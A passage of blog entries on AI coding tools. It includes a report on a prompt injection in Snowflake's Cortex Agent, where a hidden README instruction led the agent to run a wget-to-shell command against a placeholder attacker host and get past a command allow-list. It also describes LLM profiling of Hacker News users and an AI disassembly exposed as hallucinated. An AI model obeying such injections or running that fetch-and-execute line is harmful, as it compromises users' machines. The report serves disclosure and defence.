sponsorship against those projects.</p> <p>The 1.0 version has a few breaking changes compared to the 0.x series, described in <a href="https://starlette.dev/release-notes/#100rc1-february-23-2026">the release notes for 1.0.0rc1</a> that came out in February.</p> <p>The most notable of these is a change to how code runs on startup and shutdown. Previously that was handled by <code>on_startup</code> and <code>on_shutdown</code> parameters, but the new system uses a neat <a href="https://starlette.dev/lifespan/">lifespan</a> mechanism instead based around an <a href="https://docs.python.org/3/library/contextlib.html#contextlib.asynccontextmanager">async context manager</a>:</p> <pre><span class="pl-en">@<span class="pl-s1">contextlib</span>.<span class="pl-c1">asynccontextmanager</span></span> <span class="pl-k">async</span> <span class="pl-k">def</span> <span class="pl-en">lifespan</span>(<span class="pl-s1">app</span>): <span class="pl-k">async</span> <span class="pl-k">with</span> <span class="pl-en">some_async_resource</span>(): <span class="pl-en">print</span>(<span class="pl-s">"Run at startup!"</span>) <span class="pl-k">yield</span> <span class="pl-en">print</span>(<span class="pl-s">"Run on shutdown!"</span>) <span class="pl-s1">app</span> <span class="pl-c1">=</span> <span class="pl-en">Starlette</span>( <span class="pl-s1">routes</span><span class="pl-c1">=</span><span class="pl-s1">routes</span>, <span class="pl-s1">lifespan</span><span class="pl-c1">=</span><span class="pl-s1">lifespan</span> )</pre> <p>If you haven't tried Starlette before it feels to me like an asyncio-native cross between Flask and Django, unsurprising since creator Kim Christie is also responsible for Django REST Framework. Crucially, this means you can write most apps as a single Python file, Flask style.</p> <p>This makes it <em>really</em> easy for LLMs to spit out a working Starlette app from a single prompt.</p> <p>There's just one problem there: if 1.0 breaks compatibility with the Starlette code that the models have been trained on, how can we have them generate code that works with 1.0?</p> <p>I decided to see if I could get this working <a href="https://simonwillison.net/2025/Oct/16/claude-skills/">with a Skill</a>.</p> <h4 id="building-a-skill-with-claude">Building a Skill with Claude</h4> <p>Regular Claude Chat on <a href="https://claude.ai/">claude.ai</a> has skills, and one of those default skills is the <a href="https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md">skill-creator skill</a>. This means Claude knows how to build its own skills.</p> <p>So I started <a href="https://claude.ai/share/b537c340-aea7-49d6-a14d-3134aa1bd957">a chat session</a> and told it:</p> <blockquote> <p>Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature.</p> </blockquote> <p>I didn't even tell it where to find the repo, Starlette is widely enough known that I expected it could find it on its own.</p> <p>It ran <code>git clone https://github.com/encode/starlette.git</code> which is actually the old repository name, but GitHub handles redirects automatically so this worked just fine.</p> <p>The <a href="https://github.com/simonw/research/blob/main/starlette-1-skill/SKILL.md">resulting skill document</a> looked very thorough to me... and then I noticed a new button at the top I hadn't seen before labelled "Copy to your skills". So I clicked it:</p> <p><img src="https://static.simonwillison.net/static/2026/skill-button.jpg" alt="Screenshot of the Claude.ai interface showing a conversation titled &quot;Starlette 1.0 skill document with code examples.&quot; The left panel shows a chat where the user prompted: &quot;Clone Starlette from GitHub - it just had its 1.0 release. Build a skill markdown document for this release which includes code examples of every feature.&quot; Claude's responses include collapsed sections labeled &quot;Strategized cloning repository and documenting comprehensive feature examples,&quot; &quot;Examined version details and surveyed source documentation comprehensively,&quot; and &quot;Synthesized Starlette 1.0 knowledge to construct comprehensive skill documentation,&quot; with intermediate messages like &quot;I'll clone Starlette from GitHub and build a comprehensive skill document. Let me start by reading the skill-creator guide and then cloning the repo,&quot; &quot;Now let me read through all the documentation files to capture every feature:&quot; and &quot;Now I have a thorough understanding of the entire codebase. Let me build the comprehensive skill document.&quot; The right panel shows a skill preview pane with buttons &quot;Copy to your skills&quot; and &quot;Copy&quot; at the top, and a Description section reading: &quot;Build async web applications and APIs with Starlette 1.0, the lightweight ASGI framework for Python. Use this skill whenever a user wants to create an async Python web app, REST API, WebSocket server, or ASGI application using Starlette. Triggers include mentions of 'Starlette', 'ASGI', async Python web frameworks, or requests to build lightweight async APIs, WebSocket services, streaming responses, or middleware pipelines. Also use when the user is working with FastAPI internals (which is built on Starlette), needs ASGI middleware patterns, or wants a minimal async web server&quot; (text truncated)." style="max-width: 100%;" /></p> <p>And now my regular Claude chat has access to that skill!</p> <h4 id="a-task-management-demo-app">A task management demo app</h4> <p>I started <a href="https://claude.ai/share/b5285fbc-5849-4939-b473-dcb66f73503b">a new conversation</a> and prompted:</p> <blockquote> <p>Build a task management app with Starlette, it should have projects and tasks and comments and labels</p> </blockquote> <p>And Claude did exactly that, producing a simple GitHub Issues clone using Starlette 1.0, a SQLite database (via <a href="https://github.com/omnilib/aiosqlite">aiosqlite</a>) and a Jinja2 template.</p> <p>Claude even tested the app manually like this:</p> <div class="highlight highlight-source-shell"><pre><span class="pl-c1">cd</span> /home/claude/taskflow <span class="pl-k">&amp;&amp;</span> timeout 5 python -c <span class="pl-s"><span class="pl-pds">"</span></span> <span class="pl-s">import asyncio</span> <span class="pl-s">from database import init_db</span> <span class="pl-s">asyncio.run(init_db())</span> <span class="pl-s">print('DB initialized successfully')</span> <span class="pl-s"><span class="pl-pds">"</span></span> <span class="pl-k">2&gt;&amp;1</span> pip install httpx --break-system-packages -q \ <span class="pl-k">&amp;&amp;</span> <span class="pl-c1">cd</span> /home/claude/taskflow <span class="pl-k">&amp;&amp;</span> \ python -c <span class="pl-s"><span class="pl-pds">"</span></span> <span class="pl-s">from starlette.testclient import TestClient</span> <span class="pl-s">from main import app</span> <span class="pl-s"></span> <span class="pl-s">client = TestClient(app)</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/api/stats')</span> <span class="pl-s">print('Stats:', r.json())</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/api/projects')</span> <span class="pl-s">print('Projects:', len(r.json()), 'found')</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/api/tasks')</span> <span class="pl-s">print('Tasks:', len(r.json()), 'found')</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/api/labels')</span> <span class="pl-s">print('Labels:', len(r.json()), 'found')</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/api/tasks/1')</span> <span class="pl-s">t = r.json()</span> <span class="pl-s">print(f'Task 1: <span class="pl-cce">\"</span>{t[<span class="pl-cce">\"</span>title<span class="pl-cce">\"</span>]}<span class="pl-cce">\"</span> - {len(t[<span class="pl-cce">\"</span>comments<span class="pl-cce">\"</span>])} comments, {len(t[<span class="pl-cce">\"</span>labels<span class="pl-cce">\"</span>])} labels')</span> <span class="pl-s"></span> <span class="pl-s">r = client.post('/api/tasks', json={'title':'Test task','project_id':1,'priority':'high','label_ids':[1,2]})</span> <span class="pl-s">print('Created task:', r.status_code, r.json()['title'])</span> <span class="pl-s"></span> <span class="pl-s">r = client.post('/api/comments', json={'task_id':1,'content':'Test comment'})</span> <span class="pl-s">print('Created comment:', r.status_code)</span> <span class="pl-s"></span> <span class="pl-s">r = client.get('/')</span> <span class="pl-s">print('Homepage:', r.status_code, '- length:', len(r.text))</span> <span class="pl-s"></span> <span class="pl-s">print('\nAll tests passed!')</span> <span class="pl-s"><span class="pl-pds">"</span></span></pre></div> <p>For all of the buzz about Claude Code, it's easy to overlook that Claude itself counts as a coding agent now, fully able to both write and then test the code that it is writing.</p> <p>Here's what the resulting app looked like. The code is <a href="https://github.com/simonw/research/blob/main/starlette-1-skill/taskflow">here in my research repository</a>.</p> <p><img src="https://static.simonwillison.net/static/2026/taskflow.jpg" alt="Screenshot of a dark-themed Kanban board app called &quot;TaskFlow&quot; showing the &quot;Website Redesign&quot; project. The left sidebar has sections &quot;OVERVIEW&quot; with &quot;Dashboard&quot;, &quot;All Tasks&quot;, and &quot;Labels&quot;, and &quot;PROJECTS&quot; with &quot;Website Redesign&quot; (1) and &quot;API Platform&quot; (0). The main area has three columns: &quot;TO DO&quot; (0) showing &quot;No tasks&quot;, &quot;IN PROGRESS&quot; (1) with a card titled &quot;Blog about Starlette 1.0&quot; tagged &quot;MEDIUM&quot; and &quot;Documentation&quot;, and &quot;DONE&quot; (0) showing &quot;No tasks&quot;. Top-right buttons read &quot;+ New Task&quot; and &quot;Delete&quot;." style="max-width: 100%;" /></p>
entry 9172 2026-03-21 23:59:47+00:00 Profiling Hacker News users based on their comments <p>Here's a mildly dystopian prompt I've been experimenting with recently: "Profile this user", accompanied by a copy of their last 1,000 comments on Hacker News.</p> <p>Obtaining those comments is easy. The <a href="https://hn.algolia.com/api">Algolia Hacker News API</a> supports listing comments sorted by date that have a specific tag, and the author of a comment is tagged there as <code>author_username</code>. Here's a JSON feed of my (<code>simonw</code>) most recent comments, for example:</p> <p><a href="https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&amp;hitsPerPage=1000">https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&amp;hitsPerPage=1000</a></p> <p>The Algolia API is served with open CORS headers, which means you can access the API from JavaScript running on any web page.</p> <p>Last August I <a href="https://chatgpt.com/share/68a4d2b1-a678-8006-aca0-cec51b243bd3">had ChatGPT build me</a> a <a href="https://tools.simonwillison.net/hn-comments-for-user">simple tool</a> for hitting that API for any user which fetches their comments and gives me a mobile-friendly "copy to clipboard" button. I've since <a href="https://github.com/simonw/tools/commits/main/hn-comments-for-user.html">tweaked it a few times</a> with Claude.</p> <p>I can then paste the whole lot into any LLM - these days I mostly use Claude Opus 4.6 for this - and prompt "profile this user" to see what it can figure out.</p> <p>It's startlingly effective! It feels invasive to quote the profile of another user here, so I'll show you what it produces for me:</p> <blockquote> <p>This is <strong>Simon Willison</strong> — a prolific, independent software developer, blogger, and one of the most visible voices in the AI-assisted coding space. Here's a profile drawn from his comments:</p> <p><strong>Professional identity:</strong> Independent developer and writer. Co-creator of Django, creator of Datasette and many other open source tools. On the board of the Python Software Foundation. Runs a heavily-trafficked personal blog at simonwillison.net with multiple content types (entries, link blog, notes, quotations). Monetizes through GitHub sponsors, ethical ads, and occasional consulting — not through any AI company payroll, a point he defends frequently.</p> <p><strong>Core thesis on AI coding:</strong> He's the leading evangelist for what he calls "agentic engineering" — using coding agents (Claude Code, Codex CLI) as productivity multipliers for skilled developers. His central argument: LLMs don't replace programmers, they amplify existing expertise. He's writing a guide/book on this at simonwillison.net/guides. He insists these tools are deceptively difficult to use well, and that most people who report bad results simply haven't learned the craft yet.</p> <p><strong>Working style:</strong> He does most of his programming from his iPhone via Claude Code for web, often while riding BART, walking the dog, or sitting in the garden. He embraces "YOLO mode" (auto-approving agent actions) and frequently runs 2-3 agent sessions in parallel. He starts every session with "run uv run pytest" to anchor the agent in TDD. He's on the $200/month Claude Max plan.</p> <p><strong>Key technical interests:</strong> Sandboxing and security (WebAssembly, Pyodide, sandbox-exec, Firecracker), SQLite (deeply), Python packaging and tooling (uv, PyPI distribution tricks), browser-in-a-browser experiments (v86, WASM Linux), and local LLM inference. He's been learning Go "by osmosis" through coding agents.</p> <p><strong>Security consciousness:</strong> He coined the term "prompt injection" and the "lethal trifecta" (access to private data + exposure to untrusted input + ability to take actions). He's genuinely alarmed about OpenClaw/Clawdbot security risks and has been predicting a headline-grabbing prompt injection attack "in the next six months" for over two years — acknowledging it keeps not happening while insisting the risk is real. He references the "normalization of deviance" pattern frequently.</p> <p><strong>Personality and debate style:</strong> Energetic, combative when challenged, but generally good-natured. He engages heavily in HN comment threads — sometimes dozens of replies in a single discussion. He's transparent about his biases and maintains a public disclosures page. He pushes back hard against what he sees as motivated reasoning from AI skeptics, but also against AGI hype ("I refer to that as the science fiction version of AI"). He gets visibly frustrated by sock-puppet accounts and bad-faith criticism. He has a self-deprecating streak ("my stupid pelican benchmark").</p> <p><strong>Recurring themes across hundreds of comments:</strong></p> <ul> <li>"Two things can be true at the same time" — he holds nuanced positions</li> <li>Tests are for productivity, not just quality</li> <li>The November 2025 model releases (Opus 4.5, GPT-5.2) were a genuine inflection point</li> <li>Code review is the biggest bottleneck in agent-assisted workflows</li> <li>"Cognitive debt" is a real and unsolved problem</li> <li>The best engineering practices (tests, docs, CI/CD, clean code) also make agents work better</li> <li>He's deliberately trying to "teach people good software engineering while tricking them into thinking the book is about AI"</li> </ul> <p><strong>Personal interests mentioned:</strong> Niche museums (runs niche-museums.com) New Zealand kākāpō parrots, cooking food from countries he's never visited, chickens in his garden. Lives in Half Moon Bay, CA near a major pelican roost. The pelican-on-a-bicycle SVG test is his signature LLM benchmark.</p> <p><strong>In a sentence:</strong> A deeply experienced, independently-minded developer who's genuinely excited about AI coding tools, fights hard against both uncritical hype and reflexive dismissal, and is trying to professionalize how the industry uses these tools — while also worrying loudly about the security implications almost nobody else takes seriously enough.</p> </blockquote> <p>This all checks out! I ran this in Claude incognito mode to hopefully prevent Claude from guessing that I was evaluating myself and sycophantically glazing me - the tone of the response it gave here is similar to the tone I've seen against other accounts.</p> <p>I expect it guessed my real name due to my habit of linking to my own writing from some of my comments, which provides plenty of simonwillison.net URLs for it to associate with my public persona. I haven't seen it take a guess at a real name for any of the other profiles I've generated.</p> <p>It's a little creepy to be able to derive this much information about someone so easily, even when they've shared that freely in a public (and API-available) place.</p> <p>I mainly use this to check that I'm not getting embroiled in an extensive argument with someone who has a history of arguing in bad faith. Thankfully that's rarely the case - Hacker News continues to be a responsibly moderated online space.</p>
blogmark 9359 2026-03-20 23:59:14+00:00 Turbo Pascal 3.02A, deconstructed - In [Things That Turbo Pascal is Smaller Than](https://prog21.dadgum.com/116.html) James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler. This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me. It did a great job, so I had it create [this interactive artifact](https://tools.simonwillison.net/turbo-pascal-deconstructed) illustrating the result. Here's the [sequence of prompts](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) I used (in regular [claude.ai](https://claude.ai/) chat, not Claude Code): > Read this https://prog21.dadgum.com/116.html > Now find a copy of that binary online > Explore this (*I attached the zip file*) > Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations ![Infographic titled "TURBO.COM" with subtitle "Borland Turbo Pascal 3.02A — September 17, 1986 — Deconstructed" on a dark background. Four statistics are displayed: 39,731 TOTAL BYTES, 17 SEGMENTS MAPPED, 1 INT 21H INSTRUCTION, 100+ BUILT-IN IDENTIFIERS. Below is a "BINARY MEMORY MAP — 0X0100 TO 0X9C33" shown as a horizontal color-coded bar chart with a legend listing 17 segments: COM Header & Copyright, Display Configuration Table, Screen I/O & Video BIOS Routines, Keyboard Input Handler, String Output & Number Formatting, DOS System Call Dispatcher, Runtime Library Core, Error Handler & Runtime Errors, File I/O System, Software Floating-Point Engine, x86 Code Generator, Startup Banner & Main Menu Loop, File Manager & Directory Browser, Compiler Driver & Status, Full-Screen Text Editor, Pascal Parser & Lexer, and Symbol Table & Built-in Identifiers.](https://static.simonwillison.net/static/2026/turbo-pascal.jpg) **Update**: Annoyingly the [Claude share link](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) doesn't show the actual code that Claude executed, but here's [the zip file](https://static.simonwillison.net/static/2026/turbo-pascal-analysis.zip) it gave me when I asked to download all of the intermediate files. I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result! <h4 id="hallucinated-slop">Turns out it's hallucinated slop</h4> **Update 2**, 24th March 2026: rep_lodsb on Hacker News is someone who actually understands assembler, and they reviewed the annotations and [found them to be hallucinated slop](https://news.ycombinator.com/item?id=47471647#47501692): > [...] Obviously, there has to be a lot more to even a simple-minded x86 code generator than just a generic "emit opcode byte" and "emit call" routine. In general, what A"I" produced here is not a full disassembly but a collection of short snippets, potentially not even including the really interesting ones. But is it even correct? > > EmitByte here is unnecessarily pushing/popping AX, which isn't modified by the few instructions in between at all. No competent assembly language programmer would do this. So maybe against all expectations, Turbo Pascal is just really badly coded? No, it's of course a hallucination: those instructions don't appear in the binary at all! [...] > > But searching for e.g. the hex opcode B0 E8 ('mov al,0xe8') is enough to confirm that this code snippet isn't to be found *anywhere*. > > There is a lot more suspicious code, including some that couldn't possibly work (like the "ret 1" in the system call dispatcher, which would misalign the stack). > > Conclusion: it's slop Because it's amusing to loop this kind of criticism through a model, I [pasted their feedback into Claude](https://claude.ai/share/a64c94eb-c623-4fd4-b101-e3e7d66c77ca) along with instructions to re-review their the code and it agreed with their assessment: > The commenter's core charge — that the annotated disassembly is "slop" — is substantiated. The artifact presents a mix of genuine analysis (real hex dumps, some correctly disassembled sections) and wholesale fabrication (invented assembly with plausible-sounding labels and comments for roughly half the binary). The fabricated sections look convincing to a casual reader but don't survive byte-level comparison with the actual binary.
quotation 2060 2026-03-20 20:29:23+00:00 Congrats to the [@cursor_ai](https://x.com/cursor_ai) team on the launch of Composer 2! We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining & high-compute RL training is the open model ecosystem we love to support. Note: Cursor accesses Kimi-k2.5 via [@FireworksAI_HQ](https://x.com/FireworksAI_HQ) hosted RL and inference platform as part of an authorized commercial partnership. - Kimi.ai @Kimi_Moonshot
entry 9149 2026-03-19 16:45:15+00:00 Thoughts on OpenAI acquiring Astral and uv/ruff/ty <p>The big news this morning: <a href="https://astral.sh/blog/openai">Astral to join OpenAI</a> (on the Astral blog) and <a href="https://openai.com/index/openai-to-acquire-astral/">OpenAI to acquire Astral</a> (the OpenAI announcement). Astral are the company behind <a href="https://simonwillison.net/tags/uv/">uv</a>, <a href="https://simonwillison.net/tags/ruff/">ruff</a>, and <a href="https://simonwillison.net/tags/ty/">ty</a> - three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts!</p> <h4 id="the-official-line-from-openai-and-astral">The official line from OpenAI and Astral</h4> <p>The Astral team will become part of the Codex team at OpenAI.</p> <p>Charlie Marsh <a href="https://astral.sh/blog/openai">has this to say</a>:</p> <blockquote> <p>Open source is at the heart of that impact and the heart of that story; it sits at the center of everything we do. In line with our philosophy and <a href="https://openai.com/index/openai-to-acquire-astral/">OpenAI's own announcement</a>, OpenAI will continue supporting our open source tools after the deal closes. We'll keep building in the open, alongside our community -- and for the broader Python ecosystem -- just as we have from the start. [...]</p> <p>After joining the Codex team, we'll continue building our open source tools, explore ways they can work more seamlessly with Codex, and expand our reach to think more broadly about the future of software development.</p> </blockquote> <p>OpenAI's message <a href="https://openai.com/index/openai-to-acquire-astral/">has a slightly different focus</a> (highlights mine):</p> <blockquote> <p>As part of our developer-first philosophy, after closing OpenAI plans to support Astral’s open source products. <strong>By bringing Astral’s tooling and engineering expertise to OpenAI, we will accelerate our work on Codex</strong> and expand what AI can do across the software development lifecycle.</p> </blockquote> <p>This is a slightly confusing message. The <a href="https://github.com/openai/codex">Codex CLI</a> is a Rust application, and Astral have some of the best Rust engineers in the industry - <a href="https://github.com/burntsushi">BurntSushi</a> alone (<a href="https://github.com/rust-lang/regex">Rust regex</a>, <a href="https://github.com/BurntSushi/ripgrep">ripgrep</a>, <a href="https://github.com/BurntSushi/jiff">jiff</a>) may be worth the price of acquisition!</p> <p>So is this about the talent or about the product? I expect both, but I know from past experience that a product+talent acquisition can turn into a talent-only acquisition later on.</p> <h4 id="uv-is-the-big-one">uv is the big one</h4> <p>Of Astral's projects the most impactful is <a href="https://github.com/astral-sh/uv">uv</a>. If you're not familiar with it, <code>uv</code> is by far the most convincing solution to Python's environment management problems, best illustrated by <a href="https://xkcd.com/1987/">this classic XKCD</a>:</p> <p style="text-align: center"><img src="https://imgs.xkcd.com/comics/python_environment.png" alt="xkcd comic showing a tangled, chaotic flowchart of Python environment paths and installations. Nodes include &quot;PIP&quot;, &quot;EASY_INSTALL&quot;, &quot;$PYTHONPATH&quot;, &quot;ANACONDA PYTHON&quot;, &quot;ANOTHER PIP??&quot;, &quot;HOMEBREW PYTHON (2.7)&quot;, &quot;OS PYTHON&quot;, &quot;HOMEBREW PYTHON (3.6)&quot;, &quot;PYTHON.ORG BINARY (2.6)&quot;, and &quot;(MISC FOLDERS OWNED BY ROOT)&quot; connected by a mess of overlapping arrows. A stick figure with a &quot;?&quot; stands at the top left. Paths at the bottom include &quot;/usr/local/Cellar&quot;, &quot;/usr/local/opt&quot;, &quot;/usr/local/lib/python3.6&quot;, &quot;/usr/local/lib/python2.7&quot;, &quot;/python/&quot;, &quot;/newenv/&quot;, &quot;$PATH&quot;, &quot;????&quot;, and &quot;/(A BUNCH OF PATHS WITH &quot;FRAMEWORKS&quot; IN THEM SOMEWHERE)/&quot;. Caption reads: &quot;MY PYTHON ENVIRONMENT HAS BECOME SO DEGRADED THAT MY LAPTOP HAS BEEN DECLARED A SUPERFUND SITE.&quot;" style="max-width: 100%;" /></p> <p>Switch from <code>python</code> to <code>uv run</code> and most of these problems go away. I've been using it extensively for the past couple of years and it's become an essential part of my workflow.</p> <p>I'm not alone in this. According to PyPI Stats <a href="https://pypistats.org/packages/uv">uv was downloaded</a> more than 126 million times last month! Since its release in February 2024 - just two years ago - it's become one of the most popular tools for running Python code.</p> <h4 id="ruff-and-ty">Ruff and ty</h4> <p>Astral's two other big projects are <a href="https://github.com/astral-sh/ruff">ruff</a> - a Python linter and formatter - and <a href="https://github.com/astral-sh/ty">ty</a> - a fast Python type checker.</p> <p>These are popular tools that provide a great developer experience but they aren't load-bearing in the same way that <code>uv</code> is.</p> <p>They do however resonate well with coding agent tools like Codex - giving an agent access to fast linting and type checking tools can help improve the quality of the code they generate.</p> <p>I'm not convinced that integrating them <em>into</em> the coding agent itself as opposed to telling it when to run them will make a meaningful difference, but I may just not be imaginative enough here.</p> <h4 id="what-of-pyx-">What of pyx?</h4> <p>Ever since <code>uv</code> started to gain traction the Python community has been worrying about the strategic risk of a single VC-backed company owning a key piece of Python infrastructure. I <a href="https://simonwillison.net/2024/Sep/8/uv-under-discussion-on-mastodon/">wrote about</a> one of those conversations in detail back in September 2024.</p> <p>The conversation back then focused on what Astral's business plan could be, which started to take form <a href="https://simonwillison.net/2025/Aug/13/pyx/">in August 2025</a> when they announced <a href="https://astral.sh/pyx">pyx</a>, their private PyPI-style package registry for organizations.</p> <p>I'm less convinced that pyx makes sense within OpenAI, and it's notably absent from both the Astral and OpenAI announcement posts.</p> <h4 id="competitive-dynamics">Competitive dynamics</h4> <p>An interesting aspect of this deal is how it might impact the competition between Anthropic and OpenAI.</p> <p>Both companies spent most of 2025 focused on improving the coding ability of their models, resulting in the <a href="https://simonwillison.net/tags/november-2025-inflection/">November 2025 inflection point</a> when coding agents went from often-useful to almost-indispensable tools for software development.</p> <p>The competition between Anthropic's Claude Code and OpenAI's Codex is <em>fierce</em>. Those $200/month subscriptions add up to billions of dollars a year in revenue, for companies that very much need that money.</p> <p>Anthropic <a href="https://www.anthropic.com/news/anthropic-acquires-bun-as-claude-code-reaches-usd1b-milestone">acquired the Bun JavaScript runtime</a> in December 2025, an acquisition that looks somewhat similar in shape to Astral.</p> <p>Bun was already a core component of Claude Code and that acquisition looked to mainly be about ensuring that a crucial dependency stayed actively maintained. Claude Code's performance has increased significantly since then thanks to the efforts of Bun's Jarred Sumner.</p> <p>One bad version of this deal would be if OpenAI start using their ownership of <code>uv</code> as leverage in their competition with Anthropic.</p> <h4 id="astral-s-quiet-series-a-and-b">Astral's quiet series A and B</h4> <p>One detail that caught my eye from Astral's announcement, in the section thanking the team, investors, and community:</p> <blockquote> <p>Second, to our investors, especially <a href="https://www.accel.com/team/casey-aylward#bay-area">Casey Aylward</a> from Accel, who led our Seed and Series A, and <a href="https://a16z.com/author/jennifer-li/">Jennifer Li</a> from Andreessen Horowitz, who led our Series B. As a first-time, technical, solo founder, you showed far more belief in me than I ever showed in myself, and I will never forget that.</p> </blockquote> <p>As far as I can tell neither the Series A nor the Series B were previously announced - I've only been able to find coverage of the original seed round <a href="https://astral.sh/blog/announcing-astral-the-company-behind-ruff">from April 2023</a>.</p> <p>Those investors presumably now get to exchange their stake in Astral for a piece of OpenAI. I wonder how much influence they had on Astral's decision to sell.</p> <h4 id="forking-as-a-credible-exit-">Forking as a credible exit?</h4> <p>Armin Ronacher built <a href="https://til.simonwillison.net/python/rye">Rye</a>, which was later taken over by Astral and effectively merged with uv. In <a href="https://lucumr.pocoo.org/2024/8/21/harvest-season/">August 2024</a> he wrote about the risk involved in a VC-backed company owning a key piece of open source infrastructure and said the following (highlight mine):</p> <blockquote> <p>However having seen the code and what uv is doing, <strong>even in the worst possible future this is a very forkable and maintainable thing</strong>. I believe that even in case Astral shuts down or were to do something incredibly dodgy licensing wise, the community would be better off than before uv existed.</p> </blockquote> <p>Astral's own Douglas Creager <a href="https://news.ycombinator.com/item?id=47438723#47439974">emphasized this angle on Hacker News today</a>:</p> <blockquote> <p>All I can say is that <em>right now</em>, we're committed to maintaining our open-source tools with the same level of effort, care, and attention to detail as before. That does not change with this acquisition. No one can guarantee how motives, incentives, and decisions might change years down the line. But that's why we bake optionality into it with the tools being permissively licensed. That makes the worst-case scenarios have the shape of "fork and move on", and not "software disappears forever".</p> </blockquote> <p>I like and trust the Astral team and I'm optimistic that their projects will be well-maintained in their new home.</p> <p>OpenAI don't yet have much of a track record with respect to acquiring and maintaining open source projects. They've been on a bit of an acquisition spree over the past three months though, snapping up <a href="https://openai.com/index/openai-to-acquire-promptfoo/">Promptfoo</a> and <a href="https://steipete.me/posts/2026/openclaw">OpenClaw</a> (sort-of, they hired creator Peter Steinberger and are spinning OpenClaw off to a foundation), plus closed source LaTeX platform <a href="https://openai.com/index/introducing-prism/">Crixet (now Prism)</a>.</p> <p>If things do go south for <code>uv</code> and the other Astral projects we'll get to see how credible the forking exit strategy turns out to be.</p>
blogmark 9337 2026-03-18 23:56:46+00:00 Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally - Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of [Qwen3.5-397B-A17B](https://huggingface.co/Qwen/Qwen3.5-397B-A17B/tree/main) running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk. Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time. Dan used techniques described in Apple's 2023 paper [LLM in a flash: Efficient Large Language Model Inference with Limited Memory](https://arxiv.org/abs/2312.11514): > This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks. He fed the paper to Claude Code and used a variant of Andrej Karpathy's [autoresearch pattern](https://simonwillison.net/2026/Mar/13/liquid/) to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible. [danveloper/flash-moe](https://github.com/danveloper/flash-moe) has the resulting code plus [a PDF paper](https://github.com/danveloper/flash-moe/blob/main/paper/flash_moe.pdf) mostly written by Claude Opus 4.6 describing the experiment in full. The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running. Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3. It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin. **Update**: Dan's [latest version](https://twitter.com/danveloper/status/2034686509748462022) upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well.
blogmark 9336 2026-03-18 17:43:49+00:00 Snowflake Cortex AI Escapes Sandbox and Executes Malware - Hacker News PromptArmor report on a prompt injection attack chain in Snowflake's [Cortex Agent](https://docs.snowflake.com/en/user-guide/snowflake-cortex/cortex-agents), now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute this code: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) Cortex listed `cat` commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command. I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me. I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.
quotation 2050 2026-03-17 21:48:26+00:00 Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about **11-12%** faster on macOS AArch64 than the tail calling interpreter, and **5-6%**faster than the standard interpreter on x86_64 Linux. - Ken Jin
